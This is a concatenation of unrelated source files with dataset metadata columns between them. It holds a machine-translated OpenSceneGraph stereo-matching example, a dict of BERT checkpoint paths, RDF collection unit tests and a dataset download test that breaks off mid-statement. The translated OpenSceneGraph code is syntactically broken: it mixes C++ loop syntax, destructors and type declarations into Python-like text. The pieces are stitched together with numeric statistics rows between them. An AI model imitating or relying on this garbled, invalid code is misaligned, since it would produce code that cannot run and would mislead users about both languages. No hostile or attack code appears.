setShader("shaders/stereomatch_clear.frag")
flip=1
flop=0
# we can do 16 differences in one pass,
# but we must ping-pong the aggregate textures between passes
# add passes until we cover the disparity range
for (int i=min_disparity i<=max_disparity i+=16)
subp = SubtractPass(left_tex, right_tex,
width, height,
i)
aggp = AggregatePass(subp.getOutputTexture(0),
subp.getOutputTexture(1),
subp.getOutputTexture(2),
subp.getOutputTexture(3),
_OutTexture[flip],
_OutTexture[flop],
width, height,
i, window_size)
_RootGroup.addChild(subp.getRoot())
_RootGroup.addChild(aggp.getRoot())
flip = 0 if (flip) else 1
flop = 0 if (flop) else 1
# add select pass
_SelectPass = SelectPass(_OutTexture[flip],
width, height,
min_disparity, max_disparity)
_RootGroup.addChild(_SelectPass.getRoot())
StereoMultipass.~StereoMultipass()
osg.Group StereoMultipass.createTexturedQuad()
top_group = osg.Group()
quad_geode = osg.Geode()
quad_coords = osg.Vec3Array() # vertex coords
# counter-clockwise
quad_coords.push_back(osg.Vec3d(0, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 1, -1))
quad_coords.push_back(osg.Vec3d(0, 1, -1))
quad_tcoords = osg.Vec2Array() # texture coords
quad_tcoords.push_back(osg.Vec2(0, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, _TextureHeight))
quad_tcoords.push_back(osg.Vec2(0, _TextureHeight))
quad_geom = osg.Geometry()
quad_da = osg.DrawArrays(osg.PrimitiveSet.QUADS,0,4)
quad_colors = osg.Vec4Array()
quad_colors.push_back(osg.Vec4(1.0,1.0,1.0,1.0))
quad_geom.setVertexArray(quad_coords)
quad_geom.setTexCoordArray(0, quad_tcoords)
quad_geom.addPrimitiveSet(quad_da)
quad_geom.setColorArray(quad_colors, osg.Array.BIND_OVERALL)
_StateSet = quad_geom.getOrCreateStateSet()
_StateSet.setMode(GL_LIGHTING,osg.StateAttribute.OFF)
quad_geode.addDrawable(quad_geom)
top_group.addChild(quad_geode)
return top_group
void StereoMultipass.setupCamera()
# clearing
_Camera.setClearColor(osg.Vec4(10.0,0.0,0.0,1.0))
_Camera.setClearMask(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# projection and view
_Camera.setProjectionMatrix(osg.Matrix.ortho2D(0,1,0,1))
_Camera.setReferenceFrame(osg.Transform.ABSOLUTE_RF)
_Camera.setViewMatrix(osg.Matrix.identity())
# viewport
_Camera.setViewport(0, 0, _TextureWidth, _TextureHeight)
_Camera.setRenderOrder(osg.Camera.PRE_RENDER)
_Camera.setRenderTargetImplementation(osg.Camera.FRAME_BUFFER_OBJECT)
# attach two textures for aggregating results
_Camera.attach(osg.Camera.BufferComponent(osg.Camera.COLOR_BUFFER0+0), _OutTexture[0])
_Camera.attach(osg.Camera.BufferComponent(osg.Camera.COLOR_BUFFER0+1), _OutTexture[1])
void StereoMultipass.createOutputTextures()
for (int i=0 i<2 i++)
_OutTexture[i] = osg.TextureRectangle()
_OutTexture[i].setTextureSize(_TextureWidth, _TextureHeight)
_OutTexture[i].setInternalFormat(GL_RGBA)
_OutTexture[i].setFilter(osg.Texture2D.MIN_FILTER,osg.Texture2D.LINEAR)
_OutTexture[i].setFilter(osg.Texture2D.MAG_FILTER,osg.Texture2D.LINEAR)
# hdr, we want to store floats
_OutTexture[i].setInternalFormat(GL_RGBA16F_ARB)
#_OutTexture[i].setInternalFormat(GL_FLOAT_RGBA32_NV)
#_OutTexture[i].setInternalFormat(GL_FLOAT_RGBA16_NV)
_OutTexture[i].setSourceFormat(GL_RGBA)
_OutTexture[i].setSourceType(GL_FLOAT)
void StereoMultipass.setShader(str filename)
fshader = osg.Shader( osg.Shader.FRAGMENT )
fshader.loadShaderSourceFromFile(osgDB.findDataFile(filename))
_FragmentProgram = 0
_FragmentProgram = osg.Program()
_FragmentProgram.addShader(fshader)
_StateSet.setAttributeAndModes(_FragmentProgram, osg.StateAttribute.ON | osg.StateAttribute.OVERRIDE )
# Translated from file 'StereoMultipass.h'
# -*- Mode: C++ tab-width: 4 indent-tabs-mode: t c-basic-offset: 4 -*-
# OpenSceneGraph example, osgstereomatch.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#ifndef STEREOMULTIPASS_H
#define STEREOMULTIPASS_H 1
#include <osg/ref_ptr>
#include <osg/Group>
#include <osg/Camera>
#include <osg/MatrixTransform>
#include <osg/Projection>
#include <osg/Geode>
#include <osg/Geometry>
#include <osg/Texture2D>
#include <osg/TextureRectangle>
class SubtractPass :
SubtractPass(osg.TextureRectangle *left_tex,
osg.TextureRectangle *right_tex,
int width, int height,
int start_disparity)
~SubtractPass()
def getRoot():
return _RootGroup
def getOutputTexture(i):
return _OutTexture[i]
setShader = void(str filename)
createTexturedQuad = osg.Group()
createOutputTextures = void()
setupCamera = void()
_RootGroup = osg.Group()
_Camera = osg.Camera()
_InTextureLeft = osg.TextureRectangle()
_InTextureRight = osg.TextureRectangle()
osg.TextureRectangle _OutTexture[4]
_TextureWidth = int()
_TextureHeight = int()
_StartDisparity = int()
_FragmentProgram = osg.Program()
_StateSet = osg.StateSet()
class AggregatePass :
AggregatePass(osg.TextureRectangle *diff_tex0,
osg.TextureRectangle *diff_tex1,
osg.TextureRectangle *diff_tex2,
osg.TextureRectangle *diff_tex3,
osg.TextureRectangle *agg_tex_in,
osg.TextureRectangle *agg_tex_out,
int width, int height,
int start_disparity, int window_size)
~AggregatePass()
def getRoot():
return _RootGroup
def getOutputTexture():
return _OutTexture
setShader = void(str filename)
createTexturedQuad = osg.Group()
setupCamera = void()
_RootGroup = osg.Group()
_Camera = osg.Camera()
osg.TextureRectangle _InTextureDifference[4]
_InTextureAggregate = osg.TextureRectangle()
_OutTextureAggregate = osg.TextureRectangle()
_OutTexture = osg.TextureRectangle()
_TextureWidth = int()
_TextureHeight = int()
_StartDisparity = int()
_WindowSize = int()
_FragmentProgram = osg.Program()
_StateSet = osg.StateSet()
class SelectPass :
SelectPass(osg.TextureRectangle *in_tex,
int width, int height,
int min_disparity, int max_disparity)
~SelectPass()
def getRoot():
return _RootGroup
def getOutputTexture():
return _OutTexture
setShader = void(str filename)
createTexturedQuad = osg.Group()
createOutputTextures = void()
setupCamera = void()
_RootGroup = osg.Group()
_Camera = osg.Camera()
_InTexture = osg.TextureRectangle()
_OutTexture = osg.TextureRectangle()
_OutImage = osg.Image()
_TextureWidth = int()
_TextureHeight = int()
_MinDisparity = int()
_MaxDisparity = int()
_FragmentProgram = osg.Program()
_StateSet = osg.StateSet()
class StereoMultipass :
StereoMultipass(osg.TextureRectangle *left_tex,
osg.TextureRectangle *right_tex,
int width, int height,
int min_disparity, int max_disparity, int window_size)
~StereoMultipass()
def getRoot():
return _RootGroup
def getOutputTexture():
return _SelectPass.getOutputTexture()
setShader = void(str filename)
createTexturedQuad = osg.Group()
createOutputTextures = void()
setupCamera = void()
_RootGroup = osg.Group()
_Camera = osg.Camera()
_InTexture = osg.TextureRectangle()
osg.TextureRectangle _OutTexture[2]
_TextureWidth = int()
_TextureHeight = int()
_FragmentProgram = osg.Program()
_StateSet = osg.StateSet()
*_SelectPass = SelectPass()
flip = int()
flop = int()
#endif #STEREOMULTIPASS_H
# Translated from file 'StereoPass.cpp'
# -*- Mode: C++ tab-width: 4 indent-tabs-mode: t c-basic-offset: 4 -*-
# OpenSceneGraph example, osgstereomatch.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#include "StereoPass.h"
#include <osgDB/FileUtils>
#include <iostream>
StereoPass.StereoPass(osg.TextureRectangle *left_tex,
osg.TextureRectangle *right_tex,
int width, int height,
int min_disparity, int max_disparity, int window_size):
_TextureWidth(width),
_TextureHeight(height),
_MinDisparity(min_disparity),
_MaxDisparity(max_disparity),
_WindowSize(window_size)
_RootGroup = osg.Group()
_InTextureLeft = left_tex
_InTextureRight = right_tex
createOutputTextures()
_Camera = osg.Camera()
setupCamera()
_Camera.addChild(createTexturedQuad())
_RootGroup.addChild(_Camera)
setShader("shaders/stereomatch_stereopass.frag")
StereoPass.~StereoPass()
osg.Group StereoPass.createTexturedQuad()
top_group = osg.Group()
quad_geode = osg.Geode()
quad_coords = osg.Vec3Array() # vertex coords
# counter-clockwise
quad_coords.push_back(osg.Vec3d(0, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 1, -1))
quad_coords.push_back(osg.Vec3d(0, 1, -1))
quad_tcoords = osg.Vec2Array() # texture coords
quad_tcoords.push_back(osg.Vec2(0, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, _TextureHeight))
quad_tcoords.push_back(osg.Vec2(0, _TextureHeight))
quad_geom = osg.Geometry()
quad_da = osg.DrawArrays(osg.PrimitiveSet.QUADS,0,4)
quad_geom.setVertexArray(quad_coords)
quad_geom.setTexCoordArray(0, quad_tcoords)
quad_geom.addPrimitiveSet(quad_da)
_StateSet = quad_geom.getOrCreateStateSet()
_StateSet.setMode(GL_LIGHTING,osg.StateAttribute.OFF)
_StateSet.setTextureAttributeAndModes(0, _InTextureLeft, osg.StateAttribute.ON)
_StateSet.setTextureAttributeAndModes(1, _InTextureRight, osg.StateAttribute.ON)
_StateSet.addUniform(osg.Uniform("textureID0", 0))
_StateSet.addUniform(osg.Uniform("textureID1", 1))
_StateSet.addUniform(osg.Uniform("min_disparity", _MinDisparity))
_StateSet.addUniform(osg.Uniform("max_disparity", _MaxDisparity))
_StateSet.addUniform(osg.Uniform("window_size", _WindowSize))
quad_geode.addDrawable(quad_geom)
top_group.addChild(quad_geode)
return top_group
void StereoPass.setupCamera()
# clearing
_Camera.setClearColor(osg.Vec4(1.0,0.0,0.0,1.0))
_Camera.setClearMask(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# projection and view
_Camera.setProjectionMatrix(osg.Matrix.ortho2D(0,1,0,1))
_Camera.setReferenceFrame(osg.Transform.ABSOLUTE_RF)
_Camera.setViewMatrix(osg.Matrix.identity())
# viewport
_Camera.setViewport(0, 0, _TextureWidth, _TextureHeight)
_Camera.setRenderOrder(osg.Camera.PRE_RENDER)
_Camera.setRenderTargetImplementation(osg.Camera.FRAME_BUFFER_OBJECT)
# attach the output texture and use it as the color buffer.
_Camera.attach(osg.Camera.COLOR_BUFFER, _OutTexture)
void StereoPass.createOutputTextures()
_OutTexture = osg.TextureRectangle()
_OutTexture.setTextureSize(_TextureWidth, _TextureHeight)
_OutTexture.setInternalFormat(GL_RGBA)
_OutTexture.setFilter(osg.Texture2D.MIN_FILTER,osg.Texture2D.LINEAR)
_OutTexture.setFilter(osg.Texture2D.MAG_FILTER,osg.Texture2D.LINEAR)
void StereoPass.setShader(str filename)
fshader = osg.Shader( osg.Shader.FRAGMENT )
fshader.loadShaderSourceFromFile(osgDB.findDataFile(filename))
_FragmentProgram = 0
_FragmentProgram = osg.Program()
_FragmentProgram.addShader(fshader)
_StateSet.setAttributeAndModes(_FragmentProgram, osg.StateAttribute.ON | osg.StateAttribute.OVERRIDE )
# Translated from file 'StereoPass.h'
# -*- Mode: C++ tab-width: 4 indent-tabs-mode: t c-basic-offset: 4 -*-
# OpenSceneGraph example, osgstereomatch.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#ifndef STEREOPASS_H
#define STEREOPASS_H 1
#include <osg/ref_ptr>
#include <osg/Group>
#include <osg/Camera>
#include <osg/MatrixTransform>
#include <osg/Projection>
#include <osg/Geode>
#include <osg/Geometry>
#include <osg/Texture2D>
#include <osg/TextureRectangle>
class StereoPass :
StereoPass(osg.TextureRectangle *left_tex,
osg.TextureRectangle *right_tex,
int width, int height,
int min_disparity, int max_disparity, int window_size)
~StereoPass()
def getRoot():
return _RootGroup
def getOutputTexture():
return _OutTexture
setShader = void(str filename)
createTexturedQuad = osg.Group()
createOutputTextures = void()
setupCamera = void()
_RootGroup = osg.Group()
_Camera = osg.Camera()
_InTextureLeft = osg.TextureRectangle()
_InTextureRight = osg.TextureRectangle()
_OutTexture = osg.TextureRectangle()
_TextureWidth = int()
_TextureHeight = int()
_MinDisparity = int()
_MaxDisparity = int()
_WindowSize = int()
_FragmentProgram = osg.Program()
_StateSet = osg.StateSet()
#endif #STEREOPASS_H
if __name__ == "__main__":
main(sys.argv)
| 34.294566
| 224
| 0.735817
| 4,275
| 35,975
| 6.019181
| 0.103158
| 0.016478
| 0.022657
| 0.016788
| 0.782916
| 0.755091
| 0.736554
| 0.71106
| 0.700295
| 0.681797
| 0
| 0.015145
| 0.161251
| 35,975
| 1,048
| 225
| 34.32729
| 0.837642
| 0
| 0
| 0.653094
| 0
| 0.001629
| 0.037422
| 0.005922
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.100977
| 0.006515
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
5acc1a258df4b7f3aa86827b57dee3a97e19e28d
| 1,783
|
py
|
Python
|
current_models.py
|
ph10m/coref
|
88152e6bf63b5b8f9a0d7146f4235a2ce6b55e43
|
[
"Apache-2.0"
] | 376
|
2019-08-27T15:49:37.000Z
|
2022-03-29T19:37:04.000Z
|
current_models.py
|
ph10m/coref
|
88152e6bf63b5b8f9a0d7146f4235a2ce6b55e43
|
[
"Apache-2.0"
] | 90
|
2019-08-27T20:02:04.000Z
|
2022-02-23T10:00:25.000Z
|
current_models.py
|
ph10m/coref
|
88152e6bf63b5b8f9a0d7146f4235a2ce6b55e43
|
[
"Apache-2.0"
] | 109
|
2019-09-02T08:20:23.000Z
|
2022-03-04T23:18:39.000Z
|
CURRENT_MODELS = {
'google_large_cased': ('bert-large-cased', '/checkpoint/danqi/coref_eval/bert_models/cased_L-24_H-1024_A-16/bert_model.ckpt'),
'small_batch_random': ('bert-large-cased', '/checkpoint/omerlevy/span_bert_models/cased/random/checkpoint_best.pt'),
'small_batch_no_nsp_random': ('bert-large-cased', '/checkpoint/omerlevy/mandar_data/pretraining_models/no_nsp_random/checkpoint_best.pt'),
'small_batch_no_nsp_pair': ('bert-large-cased', '/checkpoint/omerlevy/mandar_data/pretraining_models/no_nsp_pair/checkpoint_best.pt'),
'small_batch_no_nsp_pair_1.2m': ('bert-large-cased', '/checkpoint/omerlevy/mandar_data/pretraining_models/no_nsp_pair/checkpoint_37_1200000.pt'),
'small_batch_no_nsp_geo_1.2m': ('bert-large-cased', '/checkpoint/omerlevy/slow_models/geo/checkpoint_37_1200000.pt'),
'small_batch_random_1.2m': ('bert-large-cased', '/checkpoint/omerlevy/span_bert_models/cased/random/checkpoint_27_1200000.pt'),
'small_batch_geo_1.2m': ('bert-large-cased', '/checkpoint/omerlevy/mandar_data/pretraining_models/geo_span_0.2/checkpoint_27_1200000.pt'),
'small_batch_np_1.2m': ('bert-large-cased', '/checkpoint/omerlevy/mandar_data/pretraining_models/np_span/checkpoint_27_1200000.pt'),
'small_batch_ner_1.2m': ('bert-large-cased', '/checkpoint/omerlevy/mandar_data/pretraining_models/ner_span/checkpoint_27_1200000.pt'),
'small_batch_word_1.2m': ('bert-large-cased', '/checkpoint/omerlevy/mandar_data/pretraining_models/word/checkpoint_27_1200000.pt')
}
MODEL_CAT_TO_GOOGLE_DIR = {'bert-base-cased': 'cased_L-12_H-768_A-12', 'bert-base-uncased': 'uncased_L-12_H-768_A-12', 'bert-large-cased': 'cased_L-24_H-1024_A-16', 'bert-large-uncased': 'uncased_L-24_H-1024_A-16', 'bert-base-uncased-1024': 'uncased_L-12_H-768_A-12'}
| 104.882353
| 267
| 0.784072
| 278
| 1,783
| 4.636691
| 0.179856
| 0.100853
| 0.130334
| 0.20481
| 0.802172
| 0.798293
| 0.708301
| 0.59969
| 0.469356
| 0.469356
| 0
| 0.075829
| 0.053281
| 1,783
| 16
| 268
| 111.4375
| 0.687796
| 0
| 0
| 0
| 0
| 0
| 0.839506
| 0.650393
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5aec9107e40e26a669fd4711c24550ca879e198b
| 7,389
|
py
|
Python
|
test/programytest/rdf/test_matching.py
|
motazsaad/fit-bot-fb-clt
|
580477aa1ec91855b621d9ae276f2705962f6a87
|
[
"MIT"
] | null | null | null |
test/programytest/rdf/test_matching.py
|
motazsaad/fit-bot-fb-clt
|
580477aa1ec91855b621d9ae276f2705962f6a87
|
[
"MIT"
] | null | null | null |
test/programytest/rdf/test_matching.py
|
motazsaad/fit-bot-fb-clt
|
580477aa1ec91855b621d9ae276f2705962f6a87
|
[
"MIT"
] | 4
|
2019-04-01T15:42:23.000Z
|
2020-11-05T08:14:27.000Z
|
import unittest
from programy.rdf.collection import RDFCollection
class RDFCollectionMatchingTests(unittest.TestCase):
def add_data(self, collection):
collection.add_entity("MONKEY", "LEGS", "2", "ANIMALS")
collection.add_entity("MONKEY", "HASFUR", "true", "ANIMALS")
collection.add_entity("ZEBRA", "LEGS", "4", "ANIMALS")
collection.add_entity("BIRD", "LEGS", "2", "ANIMALS")
collection.add_entity("ELEPHANT", "TRUNK", "true", "ANIMALS")
def test_all_as_tuples(self):
collection = RDFCollection()
self.assertIsNotNone(collection)
self.add_data(collection)
all = collection.all_as_tuples()
self.assertIsNotNone(all)
self.assertEqual(5, len(all))
self.assertTrue(["MONKEY", "LEGS", "2"] in all)
self.assertTrue(["MONKEY", "HASFUR", "true"] in all)
self.assertTrue(["ZEBRA", "LEGS", "4"] in all)
self.assertTrue(["BIRD", "LEGS", "2"] in all)
self.assertTrue(["ELEPHANT", "TRUNK", "true"] in all)
def test_match_all_as_tuples(self):
collection = RDFCollection()
self.assertIsNotNone(collection)
self.add_data(collection)
matched = collection.matched_as_tuples()
self.assertIsNotNone(matched)
self.assertEqual(5, len(matched))
self.assertTrue(["MONKEY", "LEGS", "2"] in matched)
self.assertTrue(["MONKEY", "HASFUR", "true"] in matched)
self.assertTrue(["ZEBRA", "LEGS", "4"] in matched)
self.assertTrue(["BIRD", "LEGS", "2"] in matched)
self.assertTrue(["ELEPHANT", "TRUNK", "true"] in matched)
def test_match_all_as_tuples_subject(self):
collection = RDFCollection()
self.assertIsNotNone(collection)
self.add_data(collection)
matched = collection.matched_as_tuples(subject="MONKEY")
self.assertIsNotNone(matched)
self.assertEqual(2, len(matched))
self.assertTrue(["MONKEY", "LEGS", "2"] in matched)
self.assertTrue(["MONKEY", "HASFUR", "true"] in matched)
def test_match_all_as_tuples_subject_predicate(self):
collection = RDFCollection()
self.assertIsNotNone(collection)
self.add_data(collection)
matched = collection.matched_as_tuples(subject="MONKEY", predicate="LEGS")
self.assertIsNotNone(matched)
self.assertEqual(1, len(matched))
self.assertTrue(["MONKEY", "LEGS", "2"] in matched)
def test_match_all_as_tuples_subject_predicate_object(self):
collection = RDFCollection()
self.assertIsNotNone(collection)
self.add_data(collection)
matched = collection.matched_as_tuples(subject="MONKEY", predicate="LEGS", obj="2")
self.assertIsNotNone(matched)
self.assertEqual(1, len(matched))
self.assertTrue(["MONKEY", "LEGS", "2"] in matched)
def test_match_all_as_tuples_predicate(self):
collection = RDFCollection()
self.assertIsNotNone(collection)
self.add_data(collection)
matched = collection.matched_as_tuples(predicate="LEGS")
self.assertIsNotNone(matched)
self.assertEqual(3, len(matched))
self.assertTrue(["MONKEY", "LEGS", "2"] in matched)
self.assertTrue(["ZEBRA", "LEGS", "4"] in matched)
self.assertTrue(["BIRD", "LEGS", "2"] in matched)
def test_match_all_as_tuples_predicate_object(self):
collection = RDFCollection()
self.assertIsNotNone(collection)
self.add_data(collection)
matched = collection.matched_as_tuples(predicate="LEGS", obj="2")
self.assertIsNotNone(matched)
self.assertEqual(2, len(matched))
self.assertTrue(["MONKEY", "LEGS", "2"] in matched)
self.assertTrue(["BIRD", "LEGS", "2"] in matched)
def test_match_as_tuples_subject_object(self):
collection = RDFCollection()
self.assertIsNotNone(collection)
self.add_data(collection)
matched = collection.matched_as_tuples(subject="MONKEY", obj="2")
self.assertIsNotNone(matched)
self.assertEqual(1, len(matched))
self.assertTrue(["MONKEY", "LEGS", "2"] in matched)
def test_remove_subject(self):
collection = RDFCollection()
self.assertIsNotNone(collection)
self.add_data(collection)
all = collection.all_as_tuples()
remains = collection.remove(all, subject='MONKEY')
self.assertIsNotNone(remains)
self.assertEqual(3, len(remains))
self.assertTrue(["ZEBRA", "LEGS", "4"] in remains)
self.assertTrue(["BIRD", "LEGS", "2"] in remains)
self.assertTrue(["ELEPHANT", "TRUNK", "true"] in remains)
def test_remove_subject_predicate(self):
collection = RDFCollection()
self.assertIsNotNone(collection)
self.add_data(collection)
all = collection.all_as_tuples()
remains = collection.remove(all, subject='MONKEY', predicate="LEGS")
self.assertIsNotNone(remains)
self.assertEqual(4, len(remains))
self.assertTrue(["MONKEY", "HASFUR", "true"] in remains)
self.assertTrue(["ZEBRA", "LEGS", "4"] in remains)
self.assertTrue(["BIRD", "LEGS", "2"] in remains)
self.assertTrue(["ELEPHANT", "TRUNK", "true"] in remains)
def test_remove_subject_object(self):
collection = RDFCollection()
self.assertIsNotNone(collection)
self.add_data(collection)
all = collection.all_as_tuples()
remains = collection.remove(all, subject='MONKEY', obj="2")
self.assertIsNotNone(remains)
self.assertEqual(4, len(remains))
self.assertTrue(["MONKEY", "HASFUR", "true"] in all)
self.assertTrue(["ZEBRA", "LEGS", "4"] in all)
self.assertTrue(["BIRD", "LEGS", "2"] in all)
self.assertTrue(["ELEPHANT", "TRUNK", "true"] in all)
def test_remove_predicate(self):
collection = RDFCollection()
self.assertIsNotNone(collection)
self.add_data(collection)
all = collection.all_as_tuples()
remains = collection.remove(all, predicate='LEGS')
self.assertIsNotNone(remains)
self.assertEqual(2, len(remains))
self.assertTrue(["MONKEY", "HASFUR", "true"] in remains)
self.assertTrue(["ELEPHANT", "TRUNK", "true"] in remains)
def test_remove_predicate_object(self):
collection = RDFCollection()
self.assertIsNotNone(collection)
self.add_data(collection)
all = collection.all_as_tuples()
remains = collection.remove(all, predicate='LEGS', obj="2")
self.assertIsNotNone(remains)
self.assertEqual(3, len(remains))
self.assertTrue(["MONKEY", "HASFUR", "true"] in all)
self.assertTrue(["ZEBRA", "LEGS", "4"] in all)
self.assertTrue(["ELEPHANT", "TRUNK", "true"] in all)
def test_remove_object(self):
collection = RDFCollection()
self.assertIsNotNone(collection)
self.add_data(collection)
all = collection.all_as_tuples()
remains = collection.remove(all, obj='2')
self.assertIsNotNone(remains)
self.assertEqual(3, len(remains))
self.assertTrue(["MONKEY", "HASFUR", "true"] in remains)
self.assertTrue(["ZEBRA", "LEGS", "4"] in remains)
self.assertTrue(["ELEPHANT", "TRUNK", "true"] in remains)
| 35.018957
| 91
| 0.639329
| 795
| 7,389
| 5.811321
| 0.057862
| 0.118182
| 0.069264
| 0.093939
| 0.929004
| 0.92013
| 0.89329
| 0.871861
| 0.871861
| 0.865368
| 0
| 0.007988
| 0.220598
| 7,389
| 210
| 92
| 35.185714
| 0.794235
| 0
| 0
| 0.717105
| 0
| 0
| 0.090552
| 0
| 0
| 0
| 0
| 0
| 0.532895
| 1
| 0.098684
| false
| 0
| 0.013158
| 0
| 0.118421
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
51b9bd0039914bec707746990c6e9b98ee9400ab
| 15,612
|
py
|
Python
|
packages/gtmcore/gtmcore/dataset/tests/test_background_jobs.py
|
jjwatts/gigantum-client
|
88ce0475fb6880322bdd06d987c494e29064f278
|
[
"MIT"
] | null | null | null |
packages/gtmcore/gtmcore/dataset/tests/test_background_jobs.py
|
jjwatts/gigantum-client
|
88ce0475fb6880322bdd06d987c494e29064f278
|
[
"MIT"
] | null | null | null |
packages/gtmcore/gtmcore/dataset/tests/test_background_jobs.py
|
jjwatts/gigantum-client
|
88ce0475fb6880322bdd06d987c494e29064f278
|
[
"MIT"
] | null | null | null |
import os
import pytest
import uuid
from aioresponses import aioresponses
import snappy
from mock import patch
from gtmcore.configuration import Configuration
from gtmcore.dataset.io.manager import IOManager
from gtmcore.dataset.manifest import Manifest
from gtmcore.dispatcher import jobs
from gtmcore.fixtures import mock_config_file
from gtmcore.fixtures.datasets import helper_append_file, helper_compress_file
from gtmcore.inventory.inventory import InventoryManager
class TestDatasetBackgroundJobs(object):
def test_download_dataset_files(self, mock_config_file):
im = InventoryManager(mock_config_file[0])
ds = im.create_dataset('default', 'default', "dataset100", storage_type="gigantum_object_v1", description="100")
m = Manifest(ds, 'default')
iom = IOManager(ds, m)
os.makedirs(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, "other_dir"))
helper_append_file(m.cache_mgr.cache_root, m.dataset_revision, "test1.txt", "asdfadfsdf")
helper_append_file(m.cache_mgr.cache_root, m.dataset_revision, "test2.txt", "fdsfgfd")
m.sweep_all_changes()
obj_to_push = iom.objects_to_push()
assert len(obj_to_push) == 2
_, obj_id_1 = obj_to_push[0].object_path.rsplit('/', 1)
_, obj_id_2 = obj_to_push[1].object_path.rsplit('/', 1)
obj1_target = obj_to_push[0].object_path
obj2_target = obj_to_push[1].object_path
obj1_source = os.path.join('/tmp', uuid.uuid4().hex)
obj2_source = os.path.join('/tmp', uuid.uuid4().hex)
assert os.path.exists(obj1_target) is True
assert os.path.exists(obj2_target) is True
helper_compress_file(obj1_target, obj1_source)
helper_compress_file(obj2_target, obj2_source)
assert os.path.isfile(obj1_target) is False
assert os.path.isfile(obj2_target) is False
assert os.path.isfile(obj1_source) is True
assert os.path.isfile(obj2_source) is True
# Clear out from linked dir
os.remove(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test1.txt'))
os.remove(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test2.txt'))
with patch.object(Configuration, 'find_default_config', lambda self: mock_config_file[0]):
with aioresponses() as mocked_responses:
mocked_responses.get(f'https://api.gigantum.com/object-v1/{ds.namespace}/{ds.name}/{obj_id_1}',
payload={
"presigned_url": f"https://dummyurl.com/{obj_id_1}?params=1",
"namespace": ds.namespace,
"obj_id": obj_id_1,
"dataset": ds.name
},
status=200)
with open(obj1_source, 'rb') as data1:
